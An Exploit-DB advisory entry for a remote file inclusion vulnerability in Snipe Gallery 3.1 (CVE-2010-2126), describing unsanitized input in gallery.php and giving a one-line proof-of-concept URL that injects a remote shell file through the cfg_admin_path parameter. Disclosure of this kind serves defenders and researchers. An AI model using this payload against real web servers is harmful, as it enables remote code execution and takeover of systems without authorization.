Snipe Gallery 3.1 gallery.php cfg_admin_path Parameter Remote File Inclusion

2010-05-20T00:00:00
ID EDB-ID:34016
Type exploitdb
Reporter Sn!pEr.S!Te Hacker
Modified 2010-05-20T00:00:00

Description

Snipe Gallery 3.1 gallery.php cfg_admin_path Parameter Remote File Inclusion. CVE-2010-2126. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/40279/info

Snipe Gallery is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

The issues affect Snipe Gallery versions 3.1.5 and prior. 

http://www.example.com/gallery.php?cfg_admin_path=[shell.txt ]